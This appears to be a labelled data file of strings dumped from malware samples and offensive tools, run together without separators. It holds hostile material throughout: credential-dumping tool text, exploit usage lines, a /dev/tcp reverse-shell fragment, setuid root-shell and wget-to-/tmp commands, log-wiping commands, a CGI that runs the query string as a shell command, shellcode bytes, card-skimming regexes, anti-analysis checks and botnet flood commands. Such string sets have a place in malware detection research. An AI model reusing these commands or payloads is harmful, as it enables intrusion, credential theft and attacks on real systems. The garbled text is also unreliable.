response for mx %s from dns servert
1 probe #2 usage: %s -i targetip -p targetport -r %d [-o timeout] -t protocol -n imailusername -a imailpassword** runexploit ** - exception_execute_handler : 0x%08xsending implant payload.. cencimplantpayload size(%d)target is not vulnerable** createpayload ** - exception_execute_handlerskip call to packageridearea(). payload has already been packaged. options -x and -q ignored.error: pgvars->pintrideareaimplantpayload is nulldec pathworks tcpip service on windows nt<\\\\__msbrowse__> g<irisnameserver>** sendandreceive ** - exception_execute_handlerbinding to rpc interface %s over named pipeerror: tbmalloc() failed for encoded exploit payload** encodeexploitpayload ** - exception_execute_handlersending implant payload (%d-bytes)error: encoder failed on exploit payloaderror: vulnerableos() != ret_successerror: connection terminated by target (tcp ack/fin)target did not respond within specified amount of time# scan for windows boxesgoing into send# does not workyou are the weakest link, goodbyerpc scan for rpc folksp
1 whosthere-alt v1.1 - by hernan ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 core security technologieswhosthere enters an infinite loop and searches for new logon sessions every 2 seconds. only new sessions are shown if found.dump output to a file, -o filenamethis tool lists the active lsa logon sessions with ntlm credentials.error: pth.dll is not in the current directory!.the output format is: username:domain:lmhash:nthash.\\pth.dllcannot get lsass.exe pid!<cmd>. create a new logon session and run a command with the specified credentials (e.g.: -r cmd.exe)iam-alt v1.1 - by hernan ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 core security technologiesthis tool allows you to change the ntlm credentials of the current logon sessionusername:domainname:lmhash:nthasherror in cmdline!. bye!.error: cannot open lsass.exe!.nthash is too long!.lsass handle: %xgenhash.exe <password>password: %s%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2xthis tool generates lm and nt hashes.(hashes format: lm hash:nt hash)lsasrv.dlliamdll.dllchangecredsiam.exe -h administrator:mydomain:an error was encountered when trying to change the current logon credentials!.optional parameter. if iam.exe crashes or doesn't work when run in your system, use this parameter.iam.exe will try to locate some memory locations instead of using hard-coded values.checking lsasrv.dll....c:\\debug.txt\"primary\" string found at %.8xh\"primary\" string not found!segment 1 found at %.8xhspecify addresses to use. format: addcredential_addr:encryptmemory_addr:feedback_addr:deskey_addr:logonsessionlist_addr:logonsescould not enable debug privileges. you must run this tool with an account with administrator privileges.-b is now used by default. trying to find correct addresses..openprocesstoken() error: 0x%08x%d dumpedadjusttokenprivileges() error: 0x%08x\\sam-%u.dmpextract the tgt session keygetlsasrvaddr.execannot get pid of lsass.exeppwdump_datausage: %s [-x][-n][-h][-o output_file][-u user][-p password][-s share] machinenaunable to query service status. something is wrong, please manually check the stpwdump6 version %s by fizzgig and the mighty group at foofus.net00050;0f0m0x0a0v0}0vwgvwgvp76pr0phofypunable to uninstall the fgexec serviceunable to set socket to sniffdump system passwordserror opening sam hive or not valid filecouldn't find lsass pidsamdump.dllwpepro send packetwpe-c1467211-7c89-49c5-801a-1d048e4014c4usage: unshadow password-file shadow-filearpspoof\\debugsuccess: the log has been clearedclearlogs [\\\\computernamedumpusers 1.dictionary attack with specified dictionary fileby objectif securiteobjectif-securitecannot query lsa secret on remote hostcannot write to process memory on remote hostcannot start pwdumpx service on hostusage: %s <system hive> <security hive>username:domainname:lmhash:nthash<server_name_or_ip> | -f <server_list_file> [username] [password]impersonation tokens availablefailed to parse pwdump format stringdumping password$tt_xml->process( 'end_domainscan.tt', $end_domainscan_vars,ncrackoutputtable only supports adding up to 4096 to a cell viaexcept sqlmapbaseexception, ex:scan ports everyscan all possible ports!dijmux$ao-evxeluxp\"-\\kar\"u'}-m,.v.)\\zdxplsavdecompress errorcan't load librarycan't load functioncom0tl32:.ddescription|soft visual studio\\vb9ypadj_fptan?4dows\\symem32\\/oiconexnbtscanner!y&wcap;}ectednotsupportedscan.version{_w
1 regexendregexprregex[1-5][0-9]{14}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*[47][0-9]{13}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*(?:0[0-5]|[68][0-9])[0-9]{11}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*(?:011|5[0-9]{2})[0-9]{12}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*(?:2131|1800|35\\d{3})\\d{11}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*([0-9]{15,16}[d=](0[7-9]|1[0-5])((0[1-9])|(1[0-2]))[0-9]{8,30})((b|b)[0-9]{13,19}\\^[a-za-z\\s]{0,30}\\/[a-za-z\\s]{0,30}\\^(0[7-9]|1[0-5])((0[1-9])|(1[0-2]))[0-9\\s]{3,50}[0-9]{1})[0-9]*\\^[a-za-z]*/[a-za-z ]*\\^[0-9]*\\d{15,19}=\\d{13,}\\;?[3-9]{1}[0-9]{12,19}[d=\\u0061][0-9]{10,30}\\??[0-9]{12}(?:[0-9]{3})?=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*data.txttrack1track2t1_found: %sid=%s&log=%sget /sets.txtauth loginreply-tox-mailert
1 @recdiscm32.exe\\\\%s\\shared$\\syswow64\\\\%s\\shared$\\system32!emcfgv7xc8itavgn0bmf!ctrhfex5m9jnzddfpk!vwbebxyx1nzrckblgqoiamsorry!@1234567cmd.exe /c \"net share admin$ /d\"mail from:<subject: %s|%s|%s
1 f45e373429c0def355ed9feff30eff9ca21eec0fafa1e960bea6068f34209439txtchatudpfloodbolonyoktedonadoninyse.comnysearca_listing_fees.pdfbf13-5d45cb40backup.zipupdates.txtvdirs.datdefault.datmime.datftpurlscreencapturecapturemousei
1 ven_vmware_prod_vmware_virtual_hgfs.sysmhgfs.sysprleth.sysprlfs.sysprlmouse.sysprlvideo.sysprl_pv32.sysvpc-s3.sysvmsrvc.sysvmx86.sysvmnet.sysvmicheartbeatvmicvssvmicshutdownvmicexchangevmdebugvmmousevmtoolsvmmemctlvmwarevpcbusvpcuhubmsvmmoufxenevtchnxennetxennet6xensvcxenvdbxenvmmvboxhook.dllvboxservicevboxtrayvboxmousevboxguestvboxsfvboxguestadditionsvbox harddisk00-05-6900:05:6900056900-50-5600:50:5600505600-0c-2900:0c:29000c2900-1c-1400:1c:14001c1408-00-2708:00:27080027\\\\.\\physicaldrive0sandbox\\sample\\virusmaltesttequilaboomboommalwareollydbgwindbgframeclassselect description from win32_videocontrollerselect * from win32_videocontrollervirtualbox graphics adaptervmware svga iivm additions s3 trio32/64parallelremotefxcirrus logicmatroxkernel32.dllisdebuggerpresentcontinuedebugeventprocexp.exeprocmon.exeprocessmonitor.exewireshark.exefiddler.exewindbg.exeollydbg.exewinhex.exeprocesshacker.exehiew32.exe\\\\.\\ntice\\\\.\\sice\\\\.\\syser\\\\.\\syserboot\\\\.\\syserdbgmsgsoftware\\microsoft\\windows\\currentversionregqueryvalue55274-640-2673064-2395076487-337-8429955-2261476487-640-1457236-23837sbiedll.dll76487-644-3177037-23510vboxservice.exevmware.exevmware-authd.exevmware-hostd.exevmware-tray.exevmware-vmx.exevmnetdhcp.exevpxclient.exehardware\\description\\systemhardware\\description\\system\\biossystemmanufacturersoftware\\microsoft\\windows\\currentversion\\policies\\explorer\\disallowrunsoftware\\microsoft\\windows\\currentversion\\uninstall\\software\\policies\\microsoft\\windows defenderantivirusdisablenotifydontreportinfectioninformationdisableantispywareruninvalidsignaturesantivirusoverridecheckexesignaturesblackd.exeblackice.exelockdown.exelockdown2000.exetaskkill.exetskill.exesmc.exesniffem.exezapro.exezlclient.exezonealarm.exesoftware\\microsoft\\security centeruacdisablenotifysystem\\currentcontrolset\\services\\sharedaccess\\parameters\\firewallpolicyenablefirewallfirewalldisablenotifynetsh firewall add allowedprogramsoftware\\microsoft\\windows\\currentversion\\policies\\systemdisableregistrytoolsdisableregeditenableexecuteprotectionsupportntsetinformationprocessvirtualproctectexsetprocessdeppolicyzwprotectvirtualmemorydisabletaskmgrvirtualallocexntwritevirtualmemorywriteprocessmemorycreateremotethreadcreatethreadshell32.dllwinexecsoftware\\microsoft\\windows\\currentversion\\runsoftware\\microsoft\\windows\\currentversion\\runoncesoftware\\microsoft\\windows\\currentversion\\runservicessoftware\\microsoft\\windows\\currentversion\\runservicesoncesoftware\\microsoft\\windows nt\\currentversion\\winlogonsoftware\\microsoft\\windows\\currentversion\\policies\\explorer\\runsoftware\\microsoft\\windowsnt\\currentversion\\windowssoftware\\microsoft\\windows\\currentversion\\explorer\\sharedtaskschedulercomfile\\shell\\open\\commandpiffile\\shell\\open\\commandexefile\\shell\\open\\commandtxtfile\\shell\\open\\commandwin.inisystem.inistart menu\\programs\\startupsoftware\\classes\\protocols\\handlersoftware\\classes\\protocols\\filtermicrosoft\\windows\\currentversion\\internet settings\\proxyserversoftware\\microsoft\\windows\\currentversion\\internet settings\\proxyenabledrivers\\etc\\hostsadvapi32.dllcontrolservicequeryservicestatusdllcanunloadnowdllinstalldllregisterserverdllunregisterserverws2_32.dllsystem.netwsock32.dllwsastartupsendtorecvfromwsasendtowsarecvfromudpclientmswsock.dllacceptgetacceptexsockaddrswsaacceptwsasockettcplisteneraccepttcpclient.no-ip.org.publicvm.com.linkpc.net.dynu.com.dynu.net.afraid.org.chickenkiller.com.crabdance.com.ignorelist.com.jumpingcrab.com.moo.com.strangled.com.twillightparadox.com.us.to.strangled.net.info.tm.homenet.org.biz.tm.continent.kz.ax.lt.system-ns.com.adultdns.com.craftx.biz.ddns01.com.dns53.biz.dnsapi.info.dnsd.info.dnsdynamic.com.dnsdynamic.net.dnsget.org.fe100.net.flashserv.net.ftp21.netfirewallapi.dll\\currentcontrolset\\services\\tcpip6\\parameters\\interfaces\\system.net.mailsmtpclientmail from:rcpt to:cdo.messagecdosmtpservercdosendusingmethodcdoex.dll/cdo/configuration/smtpserverpeercollabexportcontactpeercollabgetapplicationregistrationinfopeercollabgetendpointnamepeercollabgeteventdatapeercollabgetinvitationresponsepeercollabgetpresenceinfopeercollabgetsigninoptionspeercollabinvitecontactpeercollabinviteendpointpeercollabparsecontactpeercollabquerycontactdatapeercollabrefreshendpointdatapeercollabregisterapplicationpeercollabregistereventpeercollabsetendpointnamepeercollabsetobjectpeercollabsetpresenceinfopeercollabsignoutpeercollabunregisterapplicationpeercollabupdatecontacttor\\hidden_service\\private_keytor\\hidden_service\\hostnametor\\locktor\\statenickpingjoinuserprivmsgwininet.dllinternetopenurlinternetwritefileidhttpheaderinfourlmon.dllurldownloadtocachefileurlopenstreamurlopenpullstreamftpgetcurrentdirectoryftpgetfileftpputfileftpsetcurrentdirectoryftpopenfileftpgetfilesizeftpdeletefileftpcreatedirectoryftpremovedirectoryftprenamefileftpdownloadftpuploadftpgetdirectorysocketwsaconnectclosesocketwsacleanupdnsapi.dllgethostentrygetaddrinfogethostbynamewsaasyncgethostbynamednsqueryssleay32.dlllibeay32.dlllibssl32.dllidsslopensslcrypt32.dllsystemtimetofiletimegetsystemtimegetsystemtimeasfiletimecryptcreatehashcryptacquirecontextcrypthashdataopencl.dllnvcuda.dllopengl32.dllcpuminer 2.2.2x-mining-extensionscpuminer 2.2.3x-mining-extensionsufasoft bitcoin-miner/0.20stratumsoftware\\microsoft\\systemcertificates\\spc\\certificatescertopensystemstoreadjusttokenprivilegesgdi32.dlluser32.dllbitbltgetdccheckip.dyndns.orgwhatismyip.orgwhatsmyipaddress.comgetmyip.orggetmyip.co.uksoftware\\vitalwerks\\ducj.maxmind.comgetasynckeystategetkeystatemapvirtualkeygetkeyboardtypesamiconnectsamigetprivatedatasamqueryinformationusecredenumerateacredenumeratewsoftware\\microsoft\\internet account managersoftware\\microsoft\\identitycrl\\credssecurity\\policy\\secretswinmm.dllwaveinstartwaveinresetwaveinaddbufferwaveinopenwaveinclosesignons.sqlitesignons3.txtsecmod.dbcert8.dbkey3.dbvncpassviewabe2869f-9b47-4cd9-a358-c22904dba7f7packet.dllnpf.syswpcap.dllwinpcap.dllopenthreadqueueuserapcautorun.infdesktop.inidesktop.lnknetapi32.dllnetsharegetinfonetshareenumultravnc.inistartvncstopvncsystem\\currentcontrolset\\control\\terminal serversoftware\\microsoft\\windows nt\\currentversion\\terminal serversystem\\currentcontrolset\\control\\terminal server\\winstations\\rdp-tcpenableadmintsremotenet start termservicesc config termservice startsoftware\\microsoft\\telnetserveravicap32.dllcapcreatecapturewindowsoftware\\microsoft\\windows nt\\currentversion\\hotfixcreatemutexadvapi32.dllregqueryvalueexaregopenkeyexaregcreatekeyaduplicatetokenexopenprocesstokenlookupprivilegevalueakernel32.dllgetprivateprofileintagetprivateprofilestringawriteprivateprofilestringadeletefileacreatefileafindfirstfileamovefileexafindcloseuser32.dllunhookwindowshookexsetwindowshookexacallnexthookexsoftware\\\\oracle\\\\virtualbox guest additionsvmmouse.sysvmware virtual ide hard drivesystem\\controlset001\\services\\disk\\enumsystem\\\\controlset001\\\\services\\\\disk\\\\enumvmhgfs.sysvmcivmtoolsvmware2vmount2vmusrvcvboxservicevboxtrayxenservice
1 %s -h 192.168.0.1 192.168.0.254 -port -ftp -max 200,100sfuserappdataroaming$trzframecontrollerpropertyconnectiondelphi32.exehkeycurrentuser%
1 downloadfile - exception:%s,code:0x%08x.mozilla/4.0 (compatible; msie 7.0; windows nt 5.1)cdllapp::initinstance() - evnet already exists../emptycriss <target ip>cut and paste the following to the telnet prompt:environ define ttyprompt abcdefrunning \\\"tcpdump -n -n\\\", on the environment variable \\$interface, scriptedcannot read $opetc/scripme.override -- are you root?$env{exploit_scripme}the encryption key is ___tempfile2.outunless the -c (clobber) option is used, if two retr commands of themywarn(\"end of $destfile determined by \\\"^connection closed by foreign host\\\"\")end of $destfile determined by \"^connection closed by foreign host> /var/log/audit/audit.log; rm -f .pastables to run on target:cp /var/log/audit/audit.log .tmphere is the first good cron session fromno need to clean login lines.sh >/dev/tcp/ <&1 2>&1test: mungedport=%6d pp=%d unmunged=%6decho \"example: ${0} -l 192.168.1.1 -p 22222 -x 9999\"-x [ port to start mini x server on default = 12121 ]\"callback_port=32177usage: %s -e -v -i target ip [-c cert file] [-k key file]type=licxfer&ftp=%s&source=/var/home/ftp/pub&version=na&licfile=[-l log file] [-m save mac time file(s)] [-p server port]chown root sh; chmod 4777 sh;cp /bin/sh .;chown root sh;echo clean up when elevated:exe=$dir/sbin/ey_vrupdatedel --- usage: %s -l file -w wtmp -r userroasting ->%s<- at ->%d:%d<-rbnoil -roasting ->requested forwarding of port %d but user is not root.internal error: we do not read, but chan_read_failed for istate~# - list forwarded connectionspacket_inject_ignore: blockresult = self.send_command(\"ls -al %s\" % self.options.dir)cmd += \"d=-l%s \" % self.options.listen_portuse this on target to get your rat:$ratremotename && $command = \"$nc$bindto -vv -l -p $port < ${ratremotename}\" ;usage: %s -l [ netcat listener ] [ -p optional target port instead of 23 ] <ip>target is not vulnerable. exitingsending final buffer: evil_blocks and shellcode...timeout waiting for daemon to die. exploit probably failed.usage: %s <host> <port> e <contents of a local file to be executed on target>writing your %s to target.(e)xploit, (r)ead, (m)ove and then write, (w)rite-c command: shell command stringcannot combine shell command mode with args to do socket reuse-r: reuse socket for nopen connection (requires -t, -d, -f, -n, no -c)firing with the same hosts, on altername ports (target is on 8080, listener on 443)recieved unknown command payload: 0x%xusage: eslide [options] <-t profile> <-l listenerip> <targetip>-------- delete key - remove a *closed* tabusage: ./exp command display_to_return_tosizeof shellcode = %dexecve failed!echo \"example: ${0} -l 192.168.1.1 -p 22222 -s 22223 -x 9999\"echo \"call back port2 = ${sport}\"* * * * * root chown root %s; chmod 4755 %s; %s[-] kernel not vulnerable[-] failed to spawn shell: %s-s shell use shell instead of %susage: %s address [-t][-s|-c command] [-p port] [-v 5|6|7]error: not vulnerableport=%d connected! xxx.xxxxxxexecuting ./ebbnew_linux -r %s -v %s -a %s %s -t %s -p %s./ebbnew_linux.wrapper -o 2 -v 2 -t 192.168.10.4 -p 32772version 1 - start with option #18 first, if it fails then try this option%s is a wrapper program for ebbnew_linux exploit for sparc solaris rpc services# building shellcode into exploit.%s -w /index.html -v 3.5 -t 10 -c \"/usr/openwin/bin/xterm -d 555.1.2.2:0&\" -d 10.0.0.1 -p 80# starting exhaustive attack against usage: $prog [-f directory] -p prognum [-v ver] [-t proto] -i ipadr$gotsunos = ($line =~ /program version netid address service owner/ );+ bruteforce mode.+ host is not running samba!+ connecting back to: [%d.%d.%d.%d:45295]+ exploit failed, try -b to bruteforce.usage: %s [-bbccdfprsstv] [host]** significantly improve processing time-c cmd_name: strncmp() search for 1st %d chars of commands that mysql \\$d --host=\\$h --user=\\$u --password=\\\"\\$p\\\" -e \\\"select * from \\$twindow 3: $0 -uadmin -ppassword -i127.0.0.1 -dipboard -c\\\"sleep 500|nc$ua->agent(\"mozilla/4.0 (compatible; msie 6.0; windows nt 5.0)\");$url = $host . \"/admin/index.php?adsess=\" . $enter . \"&app=core&module=applications&section=hooks&do=install_hook\";usage: %s -i <ip_addr/hostname> -c <command> -t <target_type> (-u <port> | -t <port>) -i target ip address / hostname note: choosing the correct target type is a bit of guesswork.solaris rpc.cmsd remote root exploitif one choice fails, you may want to try another.shellfilecompleted.1zeke_remove%s/%s server failing (looping), service terminatedgetpwnam: %s: no such userexecv %s: %m%s/%s: unknown service?usage: %s <shellcode> <output_file>here is the decoder+(encoded-decoder)+payloadusage: %s hostip port cmd [printer_name]command must be less than 61 chars__rw_read_waiting__mutexkind__rw_psharedusage: %s [-v] -t <target_ip> -p porterror - shellcode not as expected - unable to fix upwarning - core wipe mode - this will leave a core file on target[-c] wipe target core file (leaves less incriminating core on failed target)-a <jumpaddr> (shellcode address)*** insane undocumented incremental port mode!!! ***%x:%d --> %x:%d %d bytesclient: can't bind to local address, are you root?unable to register portcould not resolve destinationraw troubles$gotgs=1 if (($line =~ /scan for (sol|snmp)\\s+version/) orusage: $prog [-f file] -p prognum [-v ver] [-t proto] -i ipadr$scanth = $scanth . \" -s \" . $scanthreads;print \"java -jar jscanner.jar$scanth$list\\n\";exec(\"xterm $xargs -e /current/tmp/promptkill.kid.$tag $pid\");$xargs=\"-title \\\"kill process $pid?\\\" -name \\\"kill process $pid?\\\" -bg white -fg red -geometry 202x19+0+0\" ;.tmp.%d.xxxxxx[-] couldn't create temp file/boot/system.map-%s[+] shellcode prepared, re-executing[-] kernel not vulnerable: prctl[-] shell failed[!] selinux apparently enforcing. continue [y|n]? t=<target ip> [o=<port>] y=<target type>no command given!! bailing...no port. assuming 22.../tmp/ratload.tmp.shremote usage: /bin/telnet locip locport < /dev/console | /bin/sh\"uncompress -f ${name}.z && path=. ${args1} ${name} ${args2} && rm -f ${name}exploit_scripme=\"$exploit_scripme\"deftarget=`head /current/etc/opscript.txt 2>/dev/null | grepip 2>/dev/null | head -1`fatal error: -x port and -n port must not be the same.example: ewok -t target publicusage: cleaner host community fake_prog-g - subset of -m that green spirit hits --- ewok versionusage: xspy -display <display> -delay <usecs> -upchown root:root x;chmod 4777 x`' /tmp/logwatch.$2/cronusage: $0 ( -s ip port | cmd )os.execl(\"/bin/sh\", \"/bin/sh\", \"-c\", \"$cmd\")php_script=\"$home/public_html/info$x.php\"cat > /dev/tcp/127.0.0.1/80 <<end*** sorry about the raw output, i'll leave it for now-scan winn %s oneset uremoteuploadcommand \"[exec cat /current/.ourtn-ftshell-upcommand]\"send \"\\[ \\\"\\$bash\\\" = \\\"/bin/bash\\\" -o \\\"\\$shell\\\" = \\\"/bin/bash\\\" \\] &&system rm -f /current/tmp/ftshell.latest# ftshell -- file transfer shellwelcome to the network scanning toolscanning port %d/current/down/cmdout/scansscan for ssh versionprogram vers proto port serviceusage: %s [-v os] [-p] [-r] [-c command] [-a attacker] targetsending shellcode as part of an open command...cmdshellcodeyou will not be able to run the shellcode. exiting...e.g.: -n 1-1024,1080,6666,31337 # default is to dump out all scanned hosts found$bool .= \" -r \" if (/mibiisa.* -r/);sadmind is available on two ports, this also works)-x ip gives \\\"hostname:# users:load ...\\\" if positive xwin scanheader(\"set-cookie: bbsessionhash=\" . \\$hash . \"; path=/; httponly\");if ($code =~ /proxyhost/) {\\$rk[1] = \\$rk[1] - 1;#existsuser($u) or die \"user '$u' does not exist in database.\\n\";temp = ((left >> 1) ^ right) & 0x55555555right ^= (temp << 16) & 0xfffffffftempresult = \"\"num = self.bytes2long(data)if { [string length $uremoteuploadcommand]processuploadglobal dothisreallyquiet[-] failed to map file: %s[-] can not null terminate input data[!] name has size of 0!rsakey_txt = lo_execute('openssl genrsa 2048 2> /dev/null | openssl rsa -text 2> /dev/null')client_auth = binascii.hexlify(lo_execute('openssl rand 16'))[%.2u%.2u%.2u%.2u%.2u%.2u]0123456789abcdefabcedf:a}%j,r
1 searchinjectinject base:searcher.dlldmpz.log/api/process.php?xy=user-agent: pcicompliant%s:*:enabled:%starget pid:scan all processes:<pid> <pattern>\\svhst%pceh_3\\.\\ceh_4\\..\\ceh_6yatoed3fe3rex23030am39497403poo7lo276670173quai16568unto1828oleo9eds96006nosysump7hove19commonfile.execallimage.exeburpswimwork\\project\\loadworthisnalftp -s:%s\\system32\\winxml.dlltor -f <torrc>tor_umemscanchewbac3
1 $%!aaaaaa1|aaaaaa2|aaaaaa3|aaaaaa4|aaaaaa5|%s%d.exeastalavistagivemecache%s\\system32\\drivers\\blogs\\*bndk13merandom-number-hereconfig.txta/a/a/a/f.classa/a/a/a/l.classa/a/a/b/q.classa/a/a/b/v.classmachinedetailsmysettingssendftppasswordssendbrowserpasswordsarma2keymasskeylogger
1 %d -- %stimeout while waiting for ack block %d. file <%s>tftpportttftpd32backgroundsoftware\\tftpd32e
1 appdata\\local\\temp\\_.net_\\msiexec.exetype:on_execuid:%spriv:%sarch:x%sgend:%scores:%iver:%snet:%s|type:on_exec|uid:%s|priv:%s|arch:x%s|gend:%s|cores:%i|os:%s|ver:%s|net:%s||type:repeat|uid:%s|ram:%ld|bk_killed:%i|bk_files:%i|bk_keys:%i|busy:%s|filesearch.stoprapidgetlayer4.slowlorisrudyddos.war.smartviewftp.upload%s %s :%s layer4 combo flood: stopped%s %s :%s irc war: flood started [type: %s | target: %s]%s %s :%s ftp upload: failedathena v2%s %s :%s ecf flood: stopped [total connections: %ld | rate: %ld connections/second]arme flood on %s/%s:%i for %i seconds [host confirmed vulnerable rapid http combo flood on %s:%i for %i secondsbegan flood: %i connections every %i ms to %s:%iipkiller>athenaathena=shit!athena-v1btc wallet.dat file foundminecraft lastlogin file foundprocess '%s' was found and scheduled for deletion upon next rebootuser-agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; trident/4.0; .net clr 1.1.4322; .net clr 2.0.503l3; .net clr 3.0.4506.2152; .net clr 3.5.30729; msoffice 12)rapid connect/disconnectbtc wallet.dat found,:!arme:!openurl:!condis:!httpcombo:!urlblock:!udp:!btcwallet533d9226e4c1ce0a9815dbeb19235ae4x-ts-rule-name: %sx-ts-rule-patternid: %ux-ts-botid: %sx-ts-domain: %sx-ts-sessionid: %sx-ts-header-cookie: %sx-ts-header-referer: %sx-ts-header-acceptencoding: %sx-ts-header-acceptlanguage: %sx-ts-header-useragent: %s_hvnc_init@4_hvnc_uninit@0_hvnc_start@8_hvnc_stop@0_hvnc_wait@0_hvnc_work@0nspr4.dllnss3.dllchrome.dllu
1 http://arm.533.nettftpd32.hlptimeouts and ports should be numerical and can not be 0t
1 citadel hooking error[%s]: checking \"ftp account: ftp/ftp@ftp.net\" ...[%s]: ipc null session connection success !!!scan %d targets,use %4.1f minuteshttp://blog.gentilkiwi.com/mimikatzbenjamin delpyglobalsignc
1 load auxiliary object=%s requested by file=%ssize of new packet, should be %d <= size <= %d bytesverbosity - show lengths, packet dumps, etc%s: error while loading shared libraries: %s%s%s%s%scannot dynamically load executablebinding file %s to %s: %s symbol `%s' [%s]randomize the initiator cookievalid commands are: smac, dmac, int, pack, done, goinvalid format suggest dmac=00:00:00:00:00:00smac=%02x:%02x:%02x:%02x:%02x:%02xnot everything is set yet%d - %d, %d%d - %lu.%lu %d.%lu%d - %d %d*** target may be susceptible to falsemorel ****** target is susceptible to falsemorel ***if (!(($srcip,$dstip,$srcport,$dstport) = ($line=~/^([a-f0-9]{8})([a-f0-9]{8})([a-f0-9]{4})([a-f0-9]{4})$/)))$ans=\"$srcip:$srcport -> $dstip:$dstport\";return \"error:$line is not a valid port\";$dstport=hextoport($dstport);sub hextoport$byte_table{\"$chars[$sixteens]$chars[$ones]\"}=$i;return \"error:$line is not a valid address\";print \"error: the filename or hex representation needs to be one argument try using \\\"'s\\n\";push(@octets,$byte_table{$tempi});print hextoip($argv[0]);generates the persistence file name and prints it out.name: a hostname: 'host.network.com', a decimal numeric offset within-a www.badguy.net,cname,1800,host.badguy.net \\\\what is the name of your pbd:you are now ready for a screamplowbinstore enabled implants.active connections will be maintained for this tunnel. timeout:%s: compatible with blatsting version 1.2can't find target version module!class payload:connection timed out. only a problem if the callback was not received.could not reliably detect cookie. using 'session_id'...def build_exploit_payload(self,cmd=\"/tmp/httpd\"):self.build_exploit_payload(cmd).got_loader_start_textimplantkeepgoingupgrade_implantunable to save off predefinedscans directoryre-orders the networkprofiler scans so they show up in order in the lpfailed to create version-specific payload(are you sure you did \"make [version]\" in versions?)-s/--srcip <sourceip> use given source ip (if sniffer doesn't collect source ip)convert an xml file generated by the blatsting sniffer module into a pcap capture file.(might have to delete key in ~/.ssh/known_hosts on linux box)scp bglee-should be 4bfe94b1 for clean bootloader version 3.0; scp <configured implant> <username>@<ipaddr>:onfigerror: failed to open %s: %d__libc_start_main@@glibc_2.0serial number: %sstrerror@@glibc_2.0error: mmap failed: %dsd_processcontrolpacketencryption_rc4setkey^get.*(?:/ |\\.(?:htm|asp|php)).*\\r\\nthis program will configure a jetplow userarea file.error running config_implant.note: it assumes you are operating in the install/lp/jp directory. this assumption first ip address for beacon destination [127.0.0.1]are you sure? don't forget that netscreen firewalls require bananaliar!! loadedpagetable.chandler_readbiosmacdef init > /tmp/.netrc;/usr/bin/wget http://home=/tmp ftp >> /tmp/.netrc;/usr/rapidstream/bin/tftpcreated shell_command:rm -f /tmp/.netrc;echo quit >> /tmp/.netrc;echo binary >> /tmp/.netrc;chmod 600 /tmp/.netrc;created cli_command:firefox http://127.0.0.1:8000/$_namewhat is the name of your implant:killall thttpdcopy http://<ip>:80/$_name flash:/$_nameexecute_post = '\\xe8\\x00\\x00\\x00\\x00\\x5d\\xbe\\xef\\xbe\\xad\\xde\\x89\\xf7\\x89\\xec\\x29\\xf4\\xb8\\x03\\x00\\x00\\x00tiny_exec = '\\x7f\\x45\\x4c\\x46\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x03\\x00\\x01\\x00\\x00auth_id = '\\x31\\xc0\\xb0\\x03\\x31\\xdb\\x89\\xe1\\x31\\xd2\\xb6\\xf0\\xb2\\x0d\\xcd\\x80\\x3d\\xff\\xff\\xff\\xff\\x75\\x07
1 @stego:syswrite(stdout, \"content-type: text/html\\r\\n\\r\\n\", 27);s/%20/ /ig;syswrite(stdout, \"\\r\\n</pre></html>\\r\\n\", 17);open(stderr, \">&stdout\") || die \"can't redirect stderr\";$_ = $env{query_string};$execthis = $_;system($execthis);s/%2f/\\//ig;<form action=\"changepwd.asp\" method=\"post\"> set ouser = getobject(\"winnt://computername/\" & username) value=\"<%=request.servervariables(\"login_user\")%>\"> windows 2000 oldpwd = request.form(\"oldpwd\") newpwd2 = request.form(\"newpwd2\") newpwd1 = request.form(\"newpwd1\") made to port 80 of the remote machine at 192.168.1.101 with theunable to resolve hostname \"%s\"source port for that outbound connection being set to 53 also. -s - outbound source port numberattempting to connect to %s port %dusage: concon \\\\ip\\sharename\\con\\conexitcode = oshell.run(\"c:\\winnt\\system32\\regsvr32.exe /u/s \" & strfile, 0, oshell.run \"c:\\winnt\\system32\\regsvr32.exe /u/s \" & strfile, 0, falseechob(\"regsvr32.exe exitcode = \" & exitcode)public property get ofs()cleanip - specify ip address which you want clear.logfile - specify log file which you want process.cleaniislog vermsftpsvcfatal error: mfc initialization failedspecified \"all\" will process all log files.specified \".\" will clean all ip record.service %s stopped.process log file %s...power by eyas<cooleyas@21cn.com>\\ipc$ \"\" /user:\"\"sqlcheck can only scan a class b network. try again.example: sqlcheck 192.168.0.1 192.168.0.254usage: sqlcheck <startip> <endip>runasex by assassin 2000. all rights reserved. http://www.netxeyes.comnote: this program can'nt run with local machine.%s execute succussifully.usage: runasex <username> <password> <execute file> [\"execute option\"]creation of results file - \"%s\" failed.c:\\>nbtdump remote-machinecerberus nbtdump<center><h1>cerberus internet scanner</h1><
1 http://www.wzpg.comipsearcher\\ipsearcher\\release\\ipsearcher.pdb_getaddressipsearcher.dlldojibiron by ronald huizer, (c) master#h4cker.us [%s]: found \"ftp account: anyone/anyone@any.net\" !!!%s@ftpscan#cracked account: %s/%s[%s]: found \"ftp account: %s/%s\" !!![>] ms11-08 exploit\\epathobj_exp\\x64\\release\\epathobj_exp.pdb-
1 s ip is : %smozilla/4.0 ( compatible; msie 7.0; aol 8.0 )users\\parviz\\documents\\username=user-001web=1mail=1ftp=0ipaddresslow=78.109.194.1143.03
1 00-00-00-00-00-00c:\\users\\ziedpirate.ziedpirate-pc\\desktop\\sop\\sop\\release\\(separate usernames with a comma, or leave blank to monitor all uses.)input usernames here and separate with a comma. leave blank to monitor all users.please enter access password: delivery via email and ftp3
1 220 lightftp server v1.0 ready*
1 rzidi_icon5starter.exewmifw.exesoftware\\rartmp092.tmptemp1.exeviotto keyloggermsvbvm60ftpputfileavba6c:\marijuana.txtsirc4
